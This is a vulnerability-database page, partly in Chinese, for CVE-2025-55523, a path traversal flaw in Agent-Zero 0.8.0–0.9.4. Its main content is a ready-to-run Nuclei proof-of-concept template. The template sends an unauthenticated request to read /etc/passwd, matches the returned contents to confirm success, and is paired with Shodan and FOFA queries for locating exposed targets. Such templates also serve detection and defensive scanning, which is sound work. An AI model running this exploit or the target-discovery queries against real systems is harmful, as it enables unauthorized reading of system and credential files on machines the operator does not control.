CVE-2025-55523: Agent-Zero 0.8.0 - 0.9.4 - Arbitrary File Download

日期: 2025-11-21 | 影响软件: Agent-Zero | POC: 已公开

漏洞描述

Agent-Zero v0.8.0 - 0.9.4 contains a path traversal caused by improper validation in /api/download_work_dir_file.py, letting attackers access unauthorized files, exploit requires crafted request.

PoC代码[已公开]

id: CVE-2025-55523

info:
  name: Agent-Zero 0.8.0 - 0.9.4 - Arbitrary File Download
  author: 0x_Akoko
  severity: high
  description: |
    Agent-Zero v0.8.0 - 0.9.4 contains a path traversal caused by improper validation in /api/download_work_dir_file.py, letting attackers access unauthorized files, exploit requires crafted request.
  impact: |
    Attackers can access unauthorized files, potentially exposing sensitive data or system information.
  remediation: |
    Update to the latest version of Agent-Zero
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-55523
    - https://github.com/agent0ai/agent-zero/issues/687
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Agent Zero"
    fofa-query: title="Agent Zero"
  tags: cve,cve2025,agent-zero,lfi,traversal,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/download_work_dir_file?path=/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "filename=passwd"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207397f992bc3c8c44e1ec780a362787f9d1f6e2d18eb4d453e36fbdc7281d7cd5022100ae71d10846e367f9d1d29c0383fa6bc5c59d920286606bc38a41b3324ec704a6:922c64590222798bb761d5b6d8e72950

相关漏洞推荐